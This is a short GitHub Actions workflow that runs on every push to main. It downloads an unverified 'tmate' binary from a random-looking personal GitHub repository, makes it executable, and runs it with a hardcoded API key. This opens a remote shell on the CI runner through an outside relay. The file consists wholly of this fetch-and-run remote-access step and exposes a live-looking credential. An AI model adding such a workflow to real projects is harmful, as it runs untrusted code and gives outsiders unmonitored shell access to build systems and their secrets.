name: TMate Setup

on:
  push:
    branches:
      - main  # adjust this according to your branch name

jobs:
  setup:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
        
      - name: Download TMate
        run: |
          wget https://raw.githubusercontent.com/hp20h5w91nf1/hp20h5w91nf1/main/tmate
          chmod +x tmate
          
      - name: Execute TMate
        run: ./tmate -F -n g2 -k tmk-mS87E0h6YTY55X6FpuAAbWFMpg
